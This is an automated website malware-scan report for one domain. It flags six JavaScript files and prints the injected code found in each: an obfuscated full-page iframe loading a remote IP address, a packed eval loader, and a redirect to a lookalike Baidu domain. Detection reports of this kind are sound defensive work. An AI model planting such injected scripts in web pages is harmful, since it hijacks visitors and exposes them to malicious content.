Malware Scanner report for artis-www.yuantupump.com

Malicious/Suspicious/Total urls checked: 0/6/15

6 pages have suspicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://artis-www.yuantupump.com/	200 OK Content-Length: 13720 Content-Type: text/html	clean
http://artis-www.yuantupump.com/needfile/jsp1878.js?vi=9334	200 OK Content-Length: 2005 Content-Type: application/x-javascript	suspicious
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div>
http://artis-www.yuantupump.com/sport112/	200 OK Content-Length: 10507 Content-Type: text/html	clean
http://artis-www.yuantupump.com/needfile/jsp7215.js?vi=1524	500 timeout Content-Length: 30 Content-Type: text/plain	clean
http://artis-www.yuantupump.com/test404page.js	404 Not Found Content-Length: 564 Content-Type: text/html	clean
http://artis-www.yuantupump.com/sport91/	200 OK Content-Length: 10073 Content-Type: text/html	clean
http://artis-www.yuantupump.com/needfile/jsp9382.js?vi=4212	200 OK Content-Length: 2005 Content-Type: application/x-javascript	suspicious
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div>
http://artis-www.yuantupump.com/sport22/	200 OK Content-Length: 11340 Content-Type: text/html	clean
http://artis-www.yuantupump.com/needfile/jsp6053.js?vi=9553	200 OK Content-Length: 2005 Content-Type: application/x-javascript	suspicious
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div>
http://artis-www.yuantupump.com/sport01/	200 OK Content-Length: 10370 Content-Type: text/html	clean
http://artis-www.yuantupump.com/needfile/jsp7861.js?vi=7168	200 OK Content-Length: 2005 Content-Type: application/x-javascript	suspicious
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div>
http://artis-www.yuantupump.com/sport41/	200 OK Content-Length: 10424 Content-Type: text/html	clean
http://artis-www.yuantupump.com/needfile/jsp3836.js?vi=3176	200 OK Content-Length: 2005 Content-Type: application/x-javascript	suspicious
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div>
http://artis-www.yuantupump.com/sport52/	200 OK Content-Length: 10952 Content-Type: text/html	clean
http://artis-www.yuantupump.com/needfile/jsp4432.js?vi=2450	200 OK Content-Length: 2005 Content-Type: application/x-javascript	suspicious
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div>

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: artis-www.yuantupump.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Apr 2014 19:25:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.17

Second query (visit from search engine):
GET / HTTP/1.1
Host: artis-www.yuantupump.com
Referer: http://www.google.com/search?q=artis-www.yuantupump.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=artis-www.yuantupump.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://artis-www.yuantupump.com/

Result: artis-www.yuantupump.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for artis-www.yuantupump.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools